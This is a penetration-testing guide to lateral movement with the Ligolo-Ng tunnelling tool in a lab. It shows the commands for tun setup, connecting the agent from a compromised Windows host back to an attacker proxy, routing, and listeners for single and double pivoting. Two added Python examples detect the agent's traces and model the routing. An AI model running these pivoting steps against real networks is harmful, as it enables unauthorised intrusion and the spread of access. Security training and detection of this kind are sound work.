This comprehensive guide delves into the intricacies of Lateral Movement utilizing Ligolo-Ng, a tool developed by Nicolas Chatelain. The Ligolo-Ng tool facilitates the establishment of tunnels through reverse TCP/TLS connections using a tun interface, avoiding the necessity of SOCKS. This guide covers various aspects, from the tool’s unique features to practical applications such as single and double pivoting within a network.
Download Ligolo-Ng:
Ligolo-Ng can be downloaded from the official repository: Ligolo-Ng Releases.
Table of Contents:
- Introduction to Ligolo-Ng
- Ligolo V/S Chisel
- Lab Setup
- Prerequisites
- Setting up Ligolo-Ng
- Single Pivoting
- Double Pivoting
Ligolo-Ng Overview:
Ligolo-Ng is a lightweight and efficient tool that lets penetration testers establish tunnels through reverse TCP/TLS connections using a tun interface. Noteworthy features: it is written in Go, it behaves like a VPN, and both the proxy and the agents are customizable Go binaries. Because traffic enters through a tun interface rather than a SOCKS proxy, it supports ICMP, UDP, SYN stealth scans, OS detection and DNS resolution, with connection speeds of up to 100 Mbits/sec. Ligolo-Ng minimizes maintenance time by leaving no tool residue on disk or in memory.
Ligolo V/S Chisel:
- Ligolo-Ng outperforms Chisel in terms of speed and customization options.
- Chisel operates on a server-client model, while Ligolo-Ng establishes individual connections with each target.
- Ligolo-Ng reduces maintenance time by avoiding tool residue on disk or in memory.
- Ligolo-Ng supports various protocols, including ICMP, UDP and SYN, in contrast to Chisel, which operates primarily on HTTP using a websocket.
Lab Setup
Follow the step-by-step guide for lateral movement within a network, covering both single and double pivoting techniques.
Prerequisites
Obtain the Ligolo ‘agent’ file for Windows 64-bit and the ‘proxy’ file for Linux 64-bit.
Install the ‘agent’ file on the target machine and the ‘proxy’ file on the attacking machine (Kali Linux).
Setting up Ligolo-Ng
Step 1: With both the agent and proxy files in hand, the next step is setting up Ligolo-Ng. Run ‘ifconfig’ first to check the current state of the interfaces (no ligolo interface exists yet). To create and activate the tun interface, execute the following commands:
ip tuntap add user root mode tun ligolo
ip link set ligolo up
Verify that the ligolo interface is up with the ‘ifconfig’ command.
Step 2: Unzip the Ligolo proxy file:
This proxy binary establishes the Ligolo side of the connection, enabling the subsequent pivoting actions. To see the full range of options the proxy accepts, use the ‘help’ command.
Step 3: The options displayed in the preceding image control which certificate the proxy presents. The approach chosen here is the ‘-selfcert’ option, which makes the proxy generate a self-signed certificate; the proxy listens on port 11601. Execute the command as illustrated in the accompanying image below:
Step 4: After the command above, the Ligolo-Ng proxy is running on the attacking machine. Next, to install the Ligolo agent on the target machine, unzip the agent archive with:
unzip ligolo-ng_agent_0.5.1_windows_amd64.zip
To facilitate the transmission of this agent file to the target, establish a server with the command:
Step 5: In this lateral-movement scenario, a session on the target has already been obtained through netcat. Using that netcat connection, the next step is downloading the Ligolo agent file onto the target system. Referring to the image below, execute the provided sequence of commands:
Step 6: The agent file has been downloaded successfully. Since the proxy is already running on Kali, the next action is to execute the agent:
./agent.exe -connect 192.168.1.5:11601 -ignore-cert
Upon executing the specified command, a Ligolo session is initiated. Then, in the proxy, use the ‘session’ command and choose ‘1’ to enter the active session. Once inside the session, execute the ‘ifconfig’ command as illustrated in the provided image.
Notably, it discloses the existence of an internal network on the server, denoted by the IPv4 address 192.168.148.130/24. This discovery prompts creating a tunnel into this internal network in the subsequent steps.
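Seen from the defender's side, the agent command above leaves two observable traces on the target: a process started with ‘-connect host:port -ignore-cert’, and an outbound TCP connection from that process to the proxy's port 11601. The following Python is an added example (not part of this guide and not Ligolo-Ng's own code) that runs that check over constructed Sysmon-style records; the field names follow Sysmon Event ID 1 (process creation) and Event ID 3 (network connection), and every sample value is made up for the example.

```python
# Added example (not from the guide or from Ligolo-Ng): flag Ligolo-Ng agent
# activity in Sysmon-style telemetry collected from a Windows host.

LIGOLO_DEFAULT_PORT = 11601  # the proxy port used with -selfcert in the guide

# Constructed records modelled on Sysmon Event ID 1 (process creation) and
# Event ID 3 (network connection). Field names follow Sysmon; values are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\Public\agent.exe",
     "CommandLine": r"agent.exe -connect 192.168.1.5:11601 -ignore-cert"},
    {"EventID": 3, "Image": r"C:\Users\Public\agent.exe", "Initiated": True,
     "DestinationIp": "192.168.1.5", "DestinationPort": 11601},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "Initiated": True, "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe", "Initiated": False,
     "DestinationIp": "192.168.1.5", "DestinationPort": 11601},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir"},
]


def agent_command_line(cmd):
    """True when a command line carries both flags the agent is started with."""
    lowered = cmd.lower()
    return "-connect" in lowered and "-ignore-cert" in lowered


def classify_event(ev):
    """Return the reasons an event looks like Ligolo-Ng agent activity (empty list = nothing seen)."""
    reasons = []
    if ev.get("EventID") == 1 and agent_command_line(ev.get("CommandLine", "")):
        reasons.append("process started with agent-style flags: " + ev["CommandLine"])
    if (ev.get("EventID") == 3 and ev.get("Initiated")
            and ev.get("DestinationPort") == LIGOLO_DEFAULT_PORT):
        reasons.append(f"{ev['Image']} opened an outbound connection to port {LIGOLO_DEFAULT_PORT}")
    return reasons


def find_suspicious(events):
    """Map each suspicious event's index to its reasons; benign events are left out."""
    findings = {}
    for i, ev in enumerate(events):
        reasons = classify_event(ev)
        if reasons:
            findings[i] = reasons
    return findings


if __name__ == "__main__":
    for idx, reasons in find_suspicious(SAMPLE_EVENTS).items():
        for reason in reasons:
            print(f"event {idx}: {reason}")
```

The inbound svchost.exe record is deliberately not flagged, since only connections the host initiated matter here. The port check is the weaker of the two signals: if the proxy is started on a non-default listening port it misses entirely, whereas the command-line check survives a port change.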
Single Pivoting
In the single pivoting scenario, the aim is to access Network B while staying within the boundaries of Network
Attempting a direct ping to Network B fails, as the image below shows, because Kali has no route into that network.
To progress towards the single pivoting objective, open a new terminal window. Then add the internal subnet to the IP routing table and confirm the addition, as illustrated in the image below, with the following commands:
ip route add 192.168.148.0/24 dev ligolo
Return to the Ligolo proxy session window and initiate the tunnelling process by entering the ‘start’ command, as demonstrated in the provided image.
Upon establishing a tunnel into network B, we executed the netexec command to scan the network B subnet, which revealed an additional Windows 10 host distinct from DC1, as depicted in the image.
Pinging the IP now succeeds, in contrast to the earlier unsuccessful attempts. Additionally, a comprehensive nmap scan can be conducted, as illustrated in the image below.
Double Pivoting
In the process of double pivoting, our objective is to gain access to Network C from Network A, utilizing Network B as an intermediary.
From the newly opened terminal window, use the Impacket tool to access the identified Windows 10 host with the IP 192.168.148.132. Then execute the following commands to download the Ligolo agent onto the Windows 10 host.
Next, execute agent.exe. Once it runs, a session will be established, since our Ligolo proxy is already operational.
agent.exe -connect 192.168.1.5:11601 -ignore-cert
Examine the Ligolo-ng proxy server: a new session, corresponding to Windows 10, will be present, as indicated in the accompanying image. Execute the ‘start’ command to initiate additional tunnelling.
Execute the ‘session’ command to display the list of sessions. Navigate through the sessions using arrow keys, selecting the desired session for access. In this instance, the aim is to access the latest session, identified as session 2. Select this session and utilize the ‘ifconfig’ command to inspect the interfaces. This action reveals an additional network C interface with the address 192.168.159.130/24, mirroring the details depicted in the image below.
Upon identifying the new network, the initial step is to attempt a ping. However, the image below shows that there is no connectivity between Kali and network C.
Add the Network C subnet to the IP route list with the following command.
ip route add 192.168.159.0/24 dev ligolo
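Both route additions in this guide (192.168.148.0/24 for the single pivot above, 192.168.159.0/24 here) work the same way: the kernel chooses the outgoing interface by longest-prefix match, so until the route exists, packets for the internal subnet leave through the default route and never reach the ligolo tun interface. The following Python is an added example (not part of this guide and not Ligolo-Ng's own code) that models that selection on a constructed routing table for the attacking machine; the eth0 interface, the 192.168.1.0/24 subnet and the default route are assumptions about the Kali host, while the host addresses are the ones used in the guide.

```python
# Added example (not from the guide or from Ligolo-Ng): longest-prefix route
# selection, to show why a host in Network B or C is unreachable until the
# 'ip route add ... dev ligolo' step and reachable afterwards.
import ipaddress

# Constructed routing table for the attacking machine before any pivot (assumption):
# Kali sits on 192.168.1.0/24 via eth0 and sends everything else to its default route.
KALI_ROUTES_BEFORE = [
    ("0.0.0.0/0", "eth0"),
    ("192.168.1.0/24", "eth0"),
]


def add_route(routes, prefix, dev):
    """Model 'ip route add <prefix> dev <dev>' without touching the real table."""
    return routes + [(prefix, dev)]


def select_route(routes, dst):
    """Pick the outgoing interface for dst the way the kernel does: most specific prefix wins."""
    dst_ip = ipaddress.ip_address(dst)
    best_net, best_dev = None, None
    for prefix, dev in routes:
        net = ipaddress.ip_network(prefix)
        if dst_ip in net and (best_net is None or net.prefixlen > best_net.prefixlen):
            best_net, best_dev = net, dev
    return best_dev


def tunnelled_hosts(routes, hosts, tun="ligolo"):
    """Subset of hosts whose traffic would enter the Ligolo tun interface."""
    return [h for h in hosts if select_route(routes, h) == tun]


if __name__ == "__main__":
    hosts = ["192.168.1.5", "192.168.148.132", "192.168.159.130"]
    single = add_route(KALI_ROUTES_BEFORE, "192.168.148.0/24", "ligolo")
    double = add_route(single, "192.168.159.0/24", "ligolo")
    for label, table in (("before", KALI_ROUTES_BEFORE),
                         ("single pivot", single), ("double pivot", double)):
        print(label, {h: select_route(table, h) for h in hosts})
```

The route only decides that a packet enters the tun interface; which agent the proxy then hands it to depends on the session in which ‘start’ was run, which is why the guide stops the tunnel in session 1 before starting it in session 2.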
With the IP route modified, the next step is adding a listener on the agent so that traffic can traverse the intermediate network and the session can be retrieved. To add the listener, use the following command:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
The image above confirms that the listener is active. To initiate tunnelling, refer to the available options using the help command. Note that the tunnel running in session 1 must be halted before tunnelling is started in session 2. This step-by-step approach passes data to the listener, which then retrieves the necessary information. This technique, known as double pivoting, involves stopping the initial tunnel in the first session with the ‘stop’ command and then executing the ‘start’ command in the second session, following the steps illustrated in the image below.
Double pivoting was successful, and it was verified with crackmapexec using the command:
Metasploitable2 was then discovered within the network, making it possible to ping and nmap scan it with the newly acquired network access, as illustrated in the image below: